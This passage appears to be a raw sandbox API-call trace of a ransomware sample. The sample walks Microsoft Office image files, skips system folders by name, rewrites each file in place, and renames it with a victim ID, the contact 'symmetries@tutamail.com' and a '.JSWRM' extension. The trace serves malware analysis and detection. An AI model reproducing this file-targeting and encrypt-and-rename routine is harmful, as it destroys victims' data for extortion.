lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.094] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0120.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0120.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0120.094] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0120.094] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0120.094] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR17F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir17f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR17F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir17f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0120.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0120.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0120.095] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xadd780c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xadd780c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xadd780c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4be9, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR18F.GIF", cAlternateFileName="")) returned 1 [0120.095] lstrcmpiW (lpString1="ZPDIR18F.GIF", lpString2=".") returned 1 [0120.095] lstrcmpiW (lpString1="ZPDIR18F.GIF", lpString2="..") returned 1 [0120.095] lstrcmpiW (lpString1="ZPDIR18F.GIF", lpString2="...") returned 1 [0120.095] lstrcmpiW (lpString1="ZPDIR18F.GIF", lpString2="windows") returned 1 [0120.095] lstrcmpiW (lpString1="ZPDIR18F.GIF", lpString2="recovery") returned 1 [0120.095] lstrcmpiW (lpString1="ZPDIR18F.GIF", lpString2="perflogs") returned 1 [0120.095] lstrcmpiW (lpString1="ZPDIR18F.GIF", lpString2="documents and settings") returned 1 [0120.095] lstrcmpiW (lpString1="ZPDIR18F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.095] lstrcmpiW (lpString1="ZPDIR18F.GIF", lpString2="system volume information") returned 1 [0120.095] lstrcmpiW (lpString1="ZPDIR18F.GIF", lpString2="msocache") returned 1 [0120.095] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0120.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR18F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR18F.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR18F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0120.095] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0120.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR18F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR18F.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR18F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0120.095] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0120.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0120.096] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.096] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0120.096] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR18F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir18f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.096] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=19433) returned 1 [0120.096] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4be0) returned 0x24e1d8 [0120.096] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x4be0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x4be0, lpOverlapped=0x0) returned 1 [0120.099] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.099] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x4be0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x4be0, lpOverlapped=0x0) returned 1 [0120.099] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.099] CloseHandle (hObject=0x314) returned 1 [0120.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0120.099] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0120.099] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0120.099] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0120.100] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.100] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0120.100] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0120.100] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0120.100] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0120.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0120.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0120.100] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR18F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir18f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR18F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir18f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0120.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0120.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0120.101] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xadfda74, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xadfda74, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xadfda74, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc11, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR19F.GIF", cAlternateFileName="")) returned 1 [0120.101] lstrcmpiW (lpString1="ZPDIR19F.GIF", lpString2=".") returned 1 [0120.101] lstrcmpiW (lpString1="ZPDIR19F.GIF", lpString2="..") returned 1 [0120.101] lstrcmpiW (lpString1="ZPDIR19F.GIF", lpString2="...") returned 1 [0120.101] lstrcmpiW (lpString1="ZPDIR19F.GIF", lpString2="windows") returned 1 [0120.101] lstrcmpiW (lpString1="ZPDIR19F.GIF", lpString2="recovery") returned 1 [0120.101] lstrcmpiW (lpString1="ZPDIR19F.GIF", lpString2="perflogs") returned 1 [0120.101] lstrcmpiW (lpString1="ZPDIR19F.GIF", lpString2="documents and settings") returned 1 [0120.101] lstrcmpiW (lpString1="ZPDIR19F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.101] lstrcmpiW (lpString1="ZPDIR19F.GIF", lpString2="system volume information") returned 1 [0120.101] lstrcmpiW (lpString1="ZPDIR19F.GIF", lpString2="msocache") returned 1 [0120.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0120.101] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR19F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.101] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR19F.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR19F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0120.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0120.101] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR19F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.101] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR19F.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR19F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0120.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0120.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0120.101] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.101] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0120.101] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR19F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir19f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.102] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=3089) returned 1 [0120.102] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.103] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc10) returned 0x24e1d8 [0120.103] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xc10, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0xc10, lpOverlapped=0x0) returned 1 [0120.104] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.104] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xc10, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0xc10, lpOverlapped=0x0) returned 1 [0120.105] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.105] CloseHandle (hObject=0x314) returned 1 [0120.105] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0120.105] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.105] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0120.105] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.105] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0120.105] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0120.105] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.105] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0120.105] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.105] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0120.105] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0120.105] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0120.105] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0120.105] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0120.105] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR19F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir19f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR19F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir19f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0120.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0120.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0120.106] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xadfda74, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xadfda74, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xadfda74, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xef5, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR1B.GIF", cAlternateFileName="")) returned 1 [0120.106] lstrcmpiW (lpString1="ZPDIR1B.GIF", lpString2=".") returned 1 [0120.106] lstrcmpiW (lpString1="ZPDIR1B.GIF", lpString2="..") returned 1 [0120.106] lstrcmpiW (lpString1="ZPDIR1B.GIF", lpString2="...") returned 1 [0120.106] lstrcmpiW (lpString1="ZPDIR1B.GIF", lpString2="windows") returned 1 [0120.106] lstrcmpiW (lpString1="ZPDIR1B.GIF", lpString2="recovery") returned 1 [0120.106] lstrcmpiW (lpString1="ZPDIR1B.GIF", lpString2="perflogs") returned 1 [0120.106] lstrcmpiW (lpString1="ZPDIR1B.GIF", lpString2="documents and settings") returned 1 [0120.106] lstrcmpiW (lpString1="ZPDIR1B.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.106] lstrcmpiW (lpString1="ZPDIR1B.GIF", lpString2="system volume information") returned 1 [0120.106] lstrcmpiW (lpString1="ZPDIR1B.GIF", lpString2="msocache") returned 1 [0120.106] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0120.106] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR1B.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0120.107] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR1B.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR1B.GIF", lpUsedDefaultChar=0x0) returned 11 [0120.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0120.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0120.107] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR1B.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0120.107] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR1B.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR1B.GIF", lpUsedDefaultChar=0x0) returned 11 [0120.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0120.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0120.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0120.107] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.107] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0120.107] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR1B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir1b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.107] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=3829) returned 1 [0120.107] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xef0) returned 0x24e1d8 [0120.108] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xef0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0xef0, lpOverlapped=0x0) returned 1 [0120.111] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.111] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xef0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0xef0, lpOverlapped=0x0) returned 1 [0120.111] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.111] CloseHandle (hObject=0x314) returned 1 [0120.111] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0120.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.111] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0120.112] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.112] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0120.112] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0120.112] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.112] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0120.112] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.112] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0120.112] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0120.112] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0120.112] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0120.112] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0120.112] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR1B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir1b.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR1B.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir1b.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.113] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0120.113] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0120.113] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0120.113] FindNextFileW (in: hFindFile=0x231c00, 